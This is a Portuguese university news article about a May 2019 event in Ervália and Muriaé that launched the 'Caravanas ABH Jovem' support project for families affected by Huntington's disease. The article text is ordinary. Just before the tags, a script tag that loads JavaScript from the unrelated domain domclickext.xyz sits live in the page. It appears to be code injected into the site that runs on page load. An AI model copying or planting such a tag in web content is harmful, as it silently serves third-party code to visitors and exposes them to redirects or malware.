Alunos e coordenadoras do UNIFAMINAS organizam evento científico


Em 30/05/2019 às 17h03

Por: Assessoria de Comunicação

No último final de semana, de 24 a 26 de maio, aconteceu nos municípios de Ervália e Muriaé um evento científico e social em prol de pessoas com uma doença rara, a doença de Huntington (DH). O evento representou o início de um projeto nacional denominado "Caravanas ABH Jovem" que tem como objetivo fornecer orientações, suporte científico e assistência relacionada ao convívio com pessoas com a DH. O projeto é formado por um grupo de jovens com histórico da DH, seus familiares e de especialistas envolvidos com a causa.

O grupo foi fundado após a participação de sete jovens brasileiros em um treinamento feito pela HDYO (Organização Juvenil da Doença de Huntington) em julho de 2018, na Colômbia. Durante o treinamento da HDYO, esses jovens criariam um projeto com o objetivo de dar apoio aos jovens impactados pela DH no Brasil utilizando as redes sociais e oferecendo suporte presencial em algumas regiões, além de criar uma rede que promova a integração entre familiares, estudantes e profissionais da área da saúde para melhora na qualidade de vida dos pacientes e demais membros da família.

A Caravana criada pela Associação Brasil Huntington Jovem ocorrerá, a princípio, nas regiões com maior prevalência da DH: em Ervália-MG, em Feira Grande-AL e em Sobral-CE. O próximo e segundo encontro será em Alagoas, de 31 de agosto a 02 de setembro e o terceiro, no Ceará, em data a ser marcada, no primeiro trimestre de 2020.

Em Ervália, o primeiro dia (24) teve quatro palestras ministradas pela Dra. Luciana de Andrade Agostinho, coordenadora de Biomedicina do UNIFAMINAS; por Maria Gorette Nunes, uma das fundadoras da ABH-Associação Brasil Huntington; pela psicóloga Elisa Macedo e pelo médico Dr. Leandro Nóbrega. Esse dia contou coma participação de 110 pessoas e ocorreu das 14h às 21h, finalizando com um jantar. Já no segundo dia (25), realizado no UNIFAMINAS, ocorreu uma capacitação técnica do grupo da ABH Jovem e de profissionais da área da saúde e afins sobre a DH. Neste dia os participantes do projeto em Ervália relataram os desafios encontrados na execução do mesmo. Estas palestras englobaram aspectos epidemiológicos, pesquisa, novas terapias, aspectos psicológicos, defesa de direitos e o uso da medicina integrativa na DH, permitindo a troca de experiências entre seus participantes. E no último dia (26) ocorreu uma reunião interna entre os integrantes da ABH Jovem para avaliar o evento e para determinar os detalhes do próximo encontro em Feira Grande-AL e uma reunião com alguns líderes locais de Ervália para a formação do núcleo ABH-Ervália.

O evento contou com a colaboração de patrocinadores locais além do apoio da UNIFAMINAS, da ABH e do GAADH (Grupo de Apoio de adolescentes com a DH), criado desde 2011 pelos cursos de Biomedicina, Psicologia e Fisioterapia do UNIFAMINAS, coordenado pela Profa. Dra. Luciana Agostinho, com apoio da Profa. Msc. Clarissana Araújo Botaro.

O UNIFAMINAS parabeniza todos pelo empenho e deseja sucesso nos próximos encontros.

<script type="text/javascript" async="" src="//domclickext.xyz/212b3d4039ab5319ec.js"></script>

Tags: DH, Evento, Científico

Fonte: Coordenação de Biomedicina